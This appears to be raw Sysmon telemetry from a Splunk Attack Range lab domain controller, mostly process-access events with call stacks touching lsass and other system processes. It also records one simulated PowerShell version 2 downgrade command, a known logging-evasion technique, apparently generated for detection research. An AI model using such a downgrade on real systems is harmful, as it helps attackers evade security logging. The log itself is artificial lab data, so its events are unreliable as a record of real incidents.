22:55:39.708{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696849Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.708{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696848Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.693{05ADC7E1-229D-6039-0B00-00000000AD01}8525640C:\Windows\system32\lsass.exe{05ADC7E1-70EB-603D-6E88-00000000AD01}6868C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696847Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.693{05ADC7E1-229D-6039-0B00-00000000AD01}8525640C:\Windows\system32\lsass.exe{05ADC7E1-70EB-603D-6E88-00000000AD01}6868C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001696846Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.693{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E481E62C18F9DE323E9FFB6082A9D478,SHA256=665EE4B309BE5D4800F24365D6F09D286B627590F2225FC5E97801FF40C36ED0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001696845Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.668{05ADC7E1-229F-6039-1600-00000000AD01}15408240C:\Windows\system32\svchost.exe{05ADC7E1-70EB-603D-6E88-00000000AD01}6868C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+dc51|C:\Windows\system32\wbem\wbemcore.dll+2cfdf|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696844Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.646{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-70EB-603D-6E88-00000000AD01}6868C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696843Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.630{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-70EB-603D-6E88-00000000AD01}6868C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001696842Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.630{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-70EB-603D-6E88-00000000AD01}6868C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696841Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.615{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696840Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.615{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696839Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.615{05ADC7E1-229D-6039-0B00-00000000AD01}8525640C:\Windows\system32\lsass.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696838Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.074{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968020C:\Windows\explorer.exe{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+16679|C:\Windows\System32\SHELL32.dll+af480|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696837Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.074{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968020C:\Windows\explorer.exe{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696836Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.074{05ADC7E1-1E7A-603D-D07D-00000000AD01}57965212C:\Windows\explorer.exe{05ADC7E1-7049-603D-4288-00000000AD01}6208C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aecdf|C:\Windows\System32\SHELL32.dll+b0420|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696835Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.074{05ADC7E1-1E7A-603D-D07D-00000000AD01}57965212C:\Windows\explorer.exe{05ADC7E1-7049-603D-4288-00000000AD01}6208C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+95ad0|C:\Windows\System32\SHELL32.dll+b03dc|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696834Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.074{05ADC7E1-1E7A-603D-D07D-00000000AD01}57965212C:\Windows\explorer.exe{05ADC7E1-7049-603D-4288-00000000AD01}6208C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b03b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696833Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.074{05ADC7E1-1E7A-603D-D07D-00000000AD01}57965212C:\Windows\explorer.exe{05ADC7E1-7049-603D-4288-00000000AD01}6208C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001697455Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.974{05ADC7E1-70EC-603D-7188-00000000AD01}7448ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001697454Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.943{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-70EC-603D-7288-00000000AD01}6288C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697453Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.943{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697452Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.943{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697451Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.943{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697450Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.943{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-70EC-603D-7288-00000000AD01}6288C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001697449Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.943{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697448Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.943{05ADC7E1-70EC-603D-7188-00000000AD01}74488356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-70EC-603D-7288-00000000AD01}6288C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|UNKNOWN(00007FF87075331B)|UNKNOWN(00007FF86FBF41A5)|UNKNOWN(00007FF86FBF3E76)|UNKNOWN(00007FF8706A54DB)|UNKNOWN(00007FF86FBB4A0C)|UNKNOWN(00007FF86FC12EDB)|UNKNOWN(00007FF86FBF6540)|UNKNOWN(00007FF86FBF6540)|UNKNOWN(00007FF86FBF63D1)|UNKNOWN(00007FF86FBE8356)|UNKNOWN(00007FF86FBF4889)|UNKNOWN(00007FF86FBF4425)|UNKNOWN(00007FF86FBF41A5)|UNKNOWN(00007FF86FBF3E76)|UNKNOWN(00007FF8706A54DB)|UNKNOWN(00007FF86FBB4A0C)|UNKNOWN(00007FF86FC12EDB) 154100x80000000000000001697447Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.949{05ADC7E1-70EC-603D-7288-00000000AD01}6288C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -version 2 -Command Write-Host C:\Users\Administrator\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-70EC-603D-7188-00000000AD01}7448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {powershell.exe -version 2 -Command Write-Host $PSVersion} 10341000x80000000000000001697446Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.927{05ADC7E1-229F-6039-1600-00000000AD01}15407628C:\Windows\system32\svchost.exe{05ADC7E1-70EC-603D-7188-00000000AD01}7448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697445Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.927{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-70EC-603D-7188-00000000AD01}7448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 